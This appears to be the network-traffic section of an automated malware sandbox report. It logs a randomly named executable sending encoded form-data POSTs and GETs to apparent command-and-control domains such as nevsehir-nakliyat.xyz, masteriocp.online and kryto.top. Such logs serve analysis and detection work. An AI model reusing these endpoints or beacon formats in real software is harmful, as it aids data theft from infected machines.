              Host: www.nevsehir-nakliyat.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 207
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.nevsehir-nakliyat.xyz
              Referer: http://www.nevsehir-nakliyat.xyz/csz1/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 4d 33 58 49 4f 45 6c 38 70 57 53 2b 4f 47 4e 55 2f 73 6e 77 4b 33 4d 48 48 74 78 44 6e 64 37 4a 76 7a 69 72 35 56 54 33 57 32 49 31 4f 43 59 78 5a 65 42 30 67 71 53 48 41 51 66 66 30 6f 66 67 79 6b 75 55 43 77 7a 67 42 31 66 6b 43 77 65 45 4c 43 2b 5a 42 50 56 4f 2b 55 45 57 6f 75 79 2b 30 35 4e 48 54 75 66 44 44 37 57 6b 2b 37 33 50 6e 78 73 39 4a 45 31 75 4d 50 4f 30 79 38 45 33 30 64 54 75 61 66 6e 7a 66 4a 35 73 44 52 5a 73 30 49 62 6a 4f 56 49 53 6f 6a 2f 73 66 6e 53 42 6b 41 68 68 75 50 30 41 6d 63 36 77 4a 73 4c 7a 70 2b 49 2f 72 7a 6e 6e 39 62 53 62 38 7a 57 4d 57 32 76 49 57 41 6b 72 4d 4c 4b 62
              Data Ascii: np=M3XIOEl8pWS+OGNU/snwK3MHHtxDnd7Jvzir5VT3W2I1OCYxZeB0gqSHAQff0ofgykuUCwzgB1fkCweELC+ZBPVO+UEWouy+05NHTufDD7Wk+73Pnxs9JE1uMPO0y8E30dTuafnzfJ5sDRZs0IbjOVISoj/sfnSBkAhhuP0Amc6wJsLzp+I/rznn9bSb8zWMW2vIWAkrMLKb


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.65795885.159.66.93803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:18.214801073 CEST821OUTPOST /csz1/ HTTP/1.1
              Host: www.nevsehir-nakliyat.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 231
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.nevsehir-nakliyat.xyz
              Referer: http://www.nevsehir-nakliyat.xyz/csz1/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 4d 33 58 49 4f 45 6c 38 70 57 53 2b 4f 6d 64 55 35 50 50 77 4d 58 4d 45 4c 4e 78 44 79 74 37 46 76 7a 65 72 35 55 58 6e 57 6c 38 31 4a 69 49 78 61 66 42 30 74 4b 53 48 4c 77 66 61 36 49 65 73 79 6b 54 68 43 79 33 67 42 31 37 6b 43 78 4f 45 4c 78 47 59 41 66 56 4d 78 30 45 55 6d 4f 79 2b 30 35 4e 48 54 75 62 70 44 39 2b 6b 2b 4b 48 50 6d 51 73 2b 44 6b 31 76 4e 50 4f 30 32 38 45 7a 30 64 54 59 61 61 2f 56 66 4c 52 73 44 54 42 73 30 5a 62 6b 46 56 49 51 6d 44 2b 35 58 56 66 58 70 68 55 77 70 2f 30 6c 31 64 69 4c 49 61 4b 70 31 4e 49 63 35 6a 48 6c 39 5a 4b 70 38 54 57 6d 55 32 58 49 45 58 6f 4d 44 2f 76 34 6b 78 78 49 4c 6b 51 5a 59 68 42 4b 72 63 31 55 52 7a 4e 6b 53 67 3d 3d
              Data Ascii: np=M3XIOEl8pWS+OmdU5PPwMXMELNxDyt7Fvzer5UXnWl81JiIxafB0tKSHLwfa6IesykThCy3gB17kCxOELxGYAfVMx0EUmOy+05NHTubpD9+k+KHPmQs+Dk1vNPO028Ez0dTYaa/VfLRsDTBs0ZbkFVIQmD+5XVfXphUwp/0l1diLIaKp1NIc5jHl9ZKp8TWmU2XIEXoMD/v4kxxILkQZYhBKrc1URzNkSg==


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.65795985.159.66.93803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:20.761667013 CEST1834OUTPOST /csz1/ HTTP/1.1
              Host: www.nevsehir-nakliyat.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 1243
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.nevsehir-nakliyat.xyz
              Referer: http://www.nevsehir-nakliyat.xyz/csz1/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 4d 33 58 49 4f 45 6c 38 70 57 53 2b 4f 6d 64 55 35 50 50 77 4d 58 4d 45 4c 4e 78 44 79 74 37 46 76 7a 65 72 35 55 58 6e 57 6b 45 31 4f 52 77 78 61 38 5a 30 73 4b 53 48 45 67 66 62 36 49 65 68 79 6b 4c 74 43 79 71 64 42 33 54 6b 42 54 57 45 4e 41 47 59 5a 50 56 4d 36 55 45 5a 6f 75 79 6e 30 35 39 44 54 75 4c 70 44 39 2b 6b 2b 49 50 50 76 68 73 2b 51 30 31 75 4d 50 4f 77 79 38 45 4c 30 62 37 6d 61 62 4c 46 66 36 78 73 44 7a 52 73 32 76 76 6b 61 6c 49 4f 68 44 2f 36 58 56 53 4a 70 68 34 38 70 38 6f 66 31 66 2b 4c 45 64 47 79 6e 4a 4d 48 71 53 7a 67 68 37 43 39 36 6a 69 43 59 47 54 4d 53 45 41 45 50 4f 72 33 6f 30 31 4f 4f 43 4a 67 49 77 6c 72 72 38 67 4c 46 48 45 34 53 35 44 6f 41 46 45 63 36 34 57 30 6c 4c 59 65 2f 69 2f 50 37 72 76 38 45 36 4f 56 4c 49 62 74 59 63 5a 4f 77 61 78 32 75 45 7a 52 64 52 72 31 69 6d 72 31 4f 66 56 33 68 7a 71 33 4d 46 39 38 35 79 73 6e 46 61 47 2b 31 32 41 2b 58 56 49 57 75 37 2b 5a 56 44 33 37 77 6b 78 4c 63 36 35 4b 39 59 30 6b 78 6f 67 47 4a 70 65 4d 6e 55 56 [TRUNCATED]
              Data Ascii: np=M3XIOEl8pWS+OmdU5PPwMXMELNxDyt7Fvzer5UXnWkE1ORwxa8Z0sKSHEgfb6IehykLtCyqdB3TkBTWENAGYZPVM6UEZouyn059DTuLpD9+k+IPPvhs+Q01uMPOwy8EL0b7mabLFf6xsDzRs2vvkalIOhD/6XVSJph48p8of1f+LEdGynJMHqSzgh7C96jiCYGTMSEAEPOr3o01OOCJgIwlrr8gLFHE4S5DoAFEc64W0lLYe/i/P7rv8E6OVLIbtYcZOwax2uEzRdRr1imr1OfV3hzq3MF985ysnFaG+12A+XVIWu7+ZVD37wkxLc65K9Y0kxogGJpeMnUV8TsBOFNcHgAdJh+nZ/ESgM+6T3UWvemIJL2dBzdJt94eng7zX569gVE8jE/KFvx99XFcz96aqPzquwyQ2zuI+2tB95TbsDlIrWEauqGiYTNuN4y+aF0g+BM3d+D8Kkx6sAP7bmc8KQjeSozYhPwFDGXi2L65DYfTyDk66JfTbTrqfwe76xL6dD1khsZjfsnc5Fk6HhnytHITsVsFNZJlPEABISR9/w8K7SVOZVd32ADgFRNW1YBnUz4pQCaQHH3X8b9FI9il784kvXzIrdaSzVeCQHeeuO7UI5Jt6gnNlJjO2XiMnjWGoqftuIiaiid/nWzuEwcP3WG0fbz49zCw4/UwWa5DVC0mf1d7Qho1To+jEzHp7X2fB0rbEJbiZz7MvZIsSKcfSpdVgN6lAN3i5qtjknbgKHRi7vBU4tsgJaET6PJcIwqF8drarWrjMr6KmaAB49Jy62PVMJpIuBJASYvh4qAneWcbzEUr0Unf1a2Lg2+915Sphyc+EbbQkSfWcYHABvu4iMN00EI5a+M8YxGE5zSo+6XUaGOwmJJBLAGE5qUEODsF2EVx/luzpCM/WUIOSrs8iwZnxa3wVwWa4aC40+vC2TWXvB4mHXtYla+aB5L85epYQEqqkNWZ6niauZAf7gQu3mr9myfZQlgm6i4HOw7vy6lYni [TRUNCATED]


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.65796085.159.66.93803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:23.305459023 CEST518OUTGET /csz1/?np=B1/oNyROsiSyJWt29sj2S0IFRvICl+iEjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eGqtyx0Ndpfqa25N0T4jVP+zcs/aWlws8PlhiBv+1+sYYzcOzaf0=&O4s0=7rrhM HTTP/1.1
              Host: www.nevsehir-nakliyat.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Sep 18, 2024 09:03:24.018718004 CEST225INHTTP/1.1 404 Not Found
              Server: nginx/1.14.1
              Date: Wed, 18 Sep 2024 07:03:23 GMT
              Content-Length: 0
              Connection: close
              X-Rate-Limit-Limit: 5s
              X-Rate-Limit-Remaining: 19
              X-Rate-Limit-Reset: 2024-09-18T07:03:28.9027992Z


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.65796113.228.81.39803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:29.515820980 CEST785OUTPOST /wg84/ HTTP/1.1
              Host: www.masteriocp.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 207
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.masteriocp.online
              Referer: http://www.masteriocp.online/wg84/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 38 6d 66 4d 30 53 47 31 6b 33 74 6b 32 4a 36 76 2f 70 61 6b 4c 56 50 70 68 55 57 53 4c 4b 77 30 73 35 4b 4f 4c 78 64 72 64 79 36 79 66 42 78 30 43 65 42 4f 33 6e 46 50 64 33 48 69 4d 35 6e 64 6a 66 58 37 50 6c 41 6e 48 4e 68 39 4c 4e 39 34 46 34 67 30 41 56 76 33 50 5a 38 78 7a 58 66 76 49 74 52 64 37 46 78 70 6c 35 6c 54 72 75 70 4a 71 4e 66 61 6b 50 39 54 35 6f 51 39 78 6d 62 75 50 6d 50 56 6e 66 4c 50 72 68 2f 61 7a 31 4f 45 46 42 6d 75 4d 45 33 38 4c 47 68 33 62 41 6c 2f 54 33 37 76 43 50 4e 32 66 43 33 4b 50 44 55 7a 74 54 6e 75 56 76 4f 44 36 43 53 48 55 6a 45 53
              Data Ascii: np=8AsyGU9UOuOI8mfM0SG1k3tk2J6v/pakLVPphUWSLKw0s5KOLxdrdy6yfBx0CeBO3nFPd3HiM5ndjfX7PlAnHNh9LN94F4g0AVv3PZ8xzXfvItRd7Fxpl5lTrupJqNfakP9T5oQ9xmbuPmPVnfLPrh/az1OEFBmuME38LGh3bAl/T37vCPN2fC3KPDUztTnuVvOD6CSHUjES
              Sep 18, 2024 09:03:30.443711996 CEST368INHTTP/1.1 301 Moved Permanently
              Server: openresty
              Date: Wed, 18 Sep 2024 07:03:30 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Location: https://www.masteriocp.online/wg84/
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.65796213.228.81.39803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:32.074074030 CEST809OUTPOST /wg84/ HTTP/1.1
              Host: www.masteriocp.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 231
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.masteriocp.online
              Referer: http://www.masteriocp.online/wg84/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 39 47 76 4d 32 7a 47 31 6c 58 74 6e 71 5a 36 76 6d 5a 61 67 4c 56 7a 70 68 56 54 66 4c 38 59 30 73 62 43 4f 4b 77 64 72 61 79 36 79 51 68 78 74 64 75 42 5a 33 6e 4a 70 64 32 37 69 4d 35 44 64 6a 66 6e 37 49 57 6f 6d 47 64 68 37 66 39 39 32 49 59 67 30 41 56 76 33 50 5a 70 71 7a 54 7a 76 49 63 68 64 35 6b 78 6f 76 5a 6c 55 38 65 70 4a 37 39 66 65 6b 50 38 38 35 71 6b 54 78 6a 66 75 50 6a 7a 56 6e 75 4c 4f 34 42 2f 63 75 6c 50 59 4d 78 43 69 56 55 4b 59 56 30 46 73 4d 67 59 66 53 42 36 31 65 38 4e 56 4e 53 58 49 50 42 4d 42 74 7a 6e 45 58 76 32 44 6f 56 65 67 62 58 68 78 50 6f 48 52 63 65 37 5a 55 34 30 69 6f 73 43 4d 38 4b 50 55 53 41 3d 3d
              Data Ascii: np=8AsyGU9UOuOI9GvM2zG1lXtnqZ6vmZagLVzphVTfL8Y0sbCOKwdray6yQhxtduBZ3nJpd27iM5Ddjfn7IWomGdh7f992IYg0AVv3PZpqzTzvIchd5kxovZlU8epJ79fekP885qkTxjfuPjzVnuLO4B/culPYMxCiVUKYV0FsMgYfSB61e8NVNSXIPBMBtznEXv2DoVegbXhxPoHRce7ZU40iosCM8KPUSA==
              Sep 18, 2024 09:03:33.004784107 CEST368INHTTP/1.1 301 Moved Permanently
              Server: openresty
              Date: Wed, 18 Sep 2024 07:03:32 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Location: https://www.masteriocp.online/wg84/
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.65796313.228.81.39803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:34.625386953 CEST1822OUTPOST /wg84/ HTTP/1.1
              Host: www.masteriocp.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 1243
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.masteriocp.online
              Referer: http://www.masteriocp.online/wg84/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 39 47 76 4d 32 7a 47 31 6c 58 74 6e 71 5a 36 76 6d 5a 61 67 4c 56 7a 70 68 56 54 66 4c 38 67 30 74 75 57 4f 4c 54 31 72 62 79 36 79 5a 42 78 6f 64 75 41 62 33 6e 52 74 64 32 32 58 4d 37 4c 64 79 4d 66 37 4a 6e 6f 6d 4a 64 68 37 41 74 39 37 46 34 68 70 41 56 2f 7a 50 5a 35 71 7a 54 7a 76 49 65 35 64 77 56 78 6f 70 5a 6c 54 72 75 70 46 71 4e 66 32 6b 50 31 4c 35 70 49 74 78 58 72 75 50 44 44 56 6c 38 54 4f 69 42 2f 65 74 6c 50 51 4d 78 2f 38 56 58 75 36 56 77 4e 57 4d 6e 77 66 66 56 37 68 5a 65 38 50 63 52 6a 43 65 52 4d 2b 68 55 66 4f 54 2b 79 64 73 32 79 2f 65 45 6c 52 4d 63 48 74 5a 2b 75 53 61 49 34 76 6c 61 6e 4c 36 72 69 68 4b 31 50 46 6e 4d 47 4c 6f 6f 43 62 35 64 74 35 68 4e 47 6c 50 4f 67 39 70 50 4e 6d 32 47 61 59 6f 4e 67 53 46 58 52 7a 4c 7a 4a 4b 51 61 73 62 55 50 72 66 6f 43 66 79 55 35 31 35 61 78 55 6c 57 39 72 47 44 50 33 77 79 4d 63 37 4d 39 2f 75 30 71 6c 4a 63 48 4c 31 75 61 49 42 70 69 4a 6e 4b 4e 4d 62 79 6e 63 34 2f 53 52 6c 4f 46 30 [TRUNCATED]
              Data Ascii: np=8AsyGU9UOuOI9GvM2zG1lXtnqZ6vmZagLVzphVTfL8g0tuWOLT1rby6yZBxoduAb3nRtd22XM7LdyMf7JnomJdh7At97F4hpAV/zPZ5qzTzvIe5dwVxopZlTrupFqNf2kP1L5pItxXruPDDVl8TOiB/etlPQMx/8VXu6VwNWMnwffV7hZe8PcRjCeRM+hUfOT+yds2y/eElRMcHtZ+uSaI4vlanL6rihK1PFnMGLooCb5dt5hNGlPOg9pPNm2GaYoNgSFXRzLzJKQasbUPrfoCfyU515axUlW9rGDP3wyMc7M9/u0qlJcHL1uaIBpiJnKNMbync4/SRlOF0nBzJ+pm5rSbd45XxQ264B+1aHsWKbe1QYfajh39Kmk2pyftqdG472JukdHEyXuShCnpuSwKPtnx7yIZYLrr5VeEiMIyBXWFv4IwD5hFOytYY49IqKbMR9Qwuv6amLZbXUOq8+agbl0nEqwkmkAWFZRXCeyXTYVOwTp++F9ldJn4Oy86zs8B18mFDfkyOaQQMgoPqX4Uvmx5Z2vHoh/TRVU+OmCBZDb3/2bbw9ta9zZIobk9b9W9zasHUFNXM5nLC6exAD4vdZ8U7g2DE4vSDNCDda5oEm3B6mV3IFa0Vr8336eLZYAlVxyejs2ciYHd9MvkJhNB8iLCPP/BK9bZX6lKOrc+phQk1ajtYSQcwF/ijUucwb4iP5NptYomeKhQ5IkXXUQXHCvamzMGY944BTsCnlDe4e3I58G0INUfxnPTaZp4jbdETcj8CjSeLGl1MyrhS0iOtFPZSf3s4Q2OF/0Rmt+04IZySZOQaaI8IwkjrNogN0c4wwMKKtU54p8Fhi2049MQX+5ak4qqPwumuQw6LcW7tp/AuHe0flIOkFmfuO1sdsMnSavPYL7M2Ar+EO33vXmCNGCE71f8sZZVQ2nddjUog2IswuXKZVZUihlwhaawfHo3vlih8fKE5mlSp+FuNQg7JcYMoUQvi4gvNHLedBp+Pv+ou2z [TRUNCATED]
              Sep 18, 2024 09:03:35.518085003 CEST368INHTTP/1.1 301 Moved Permanently
              Server: openresty
              Date: Wed, 18 Sep 2024 07:03:35 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Location: https://www.masteriocp.online/wg84/
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.65796413.228.81.39803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:37.164659977 CEST514OUTGET /wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiJL1tOfgyOKUOFFDpBfdN6WGkZZw760Atp7sDgLoyqrjSo8Yq8vY=&O4s0=7rrhM HTTP/1.1
              Host: www.masteriocp.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Sep 18, 2024 09:03:38.097789049 CEST519INHTTP/1.1 301 Moved Permanently
              Server: openresty
              Date: Wed, 18 Sep 2024 07:03:37 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Location: https://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiJL1tOfgyOKUOFFDpBfdN6WGkZZw760Atp7sDgLoyqrjSo8Yq8vY=&O4s0=7rrhM
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.657965162.0.213.94803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:43.712222099 CEST761OUTPOST /09dt/ HTTP/1.1
              Host: www.kryto.top
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 207
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.kryto.top
              Referer: http://www.kryto.top/09dt/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 46 53 57 4c 52 50 70 43 42 56 72 4a 36 77 68 6e 38 35 43 7a 56 67 49 6a 63 51 6d 41 36 41 49 42 70 4c 41 7a 42 64 30 38 79 55 6e 56 58 67 58 73 41 30 59 46 30 74 64 74 7a 75 6c 6e 53 4c 69 33 4b 79 55 38 35 47 5a 47 54 5a 63 66 79 5a 55 50 71 41 34 4c 43 43 4b 6f 77 70 34 33 75 6a 7a 4a 2b 62 78 6d 79 31 4f 43 57 2f 37 49 34 6d 53 57 57 36 61 4d 49 43 47 37 6d 6f 39 4f 44 45 44 6f 6b 32 48 38 4c 46 6f 32 62 54 37 6f 56 43 31 58 69 31 47 58 61 70 64 54 73 67 42 74 50 57 5a 38 41 43 6f 66 62 33 51 2f 56 59 44 64 52 69 78 56 59 34 54 4b 76 78 37 66 47 42 33 35 6f 53 54 50
              Data Ascii: np=mZ3m6Qa3ZY/2FSWLRPpCBVrJ6whn85CzVgIjcQmA6AIBpLAzBd08yUnVXgXsA0YF0tdtzulnSLi3KyU85GZGTZcfyZUPqA4LCCKowp43ujzJ+bxmy1OCW/7I4mSWW6aMICG7mo9ODEDok2H8LFo2bT7oVC1Xi1GXapdTsgBtPWZ8ACofb3Q/VYDdRixVY4TKvx7fGB35oSTP
              Sep 18, 2024 09:03:44.286305904 CEST1236INHTTP/1.1 404 Not Found
              Date: Wed, 18 Sep 2024 07:03:44 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 16052
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
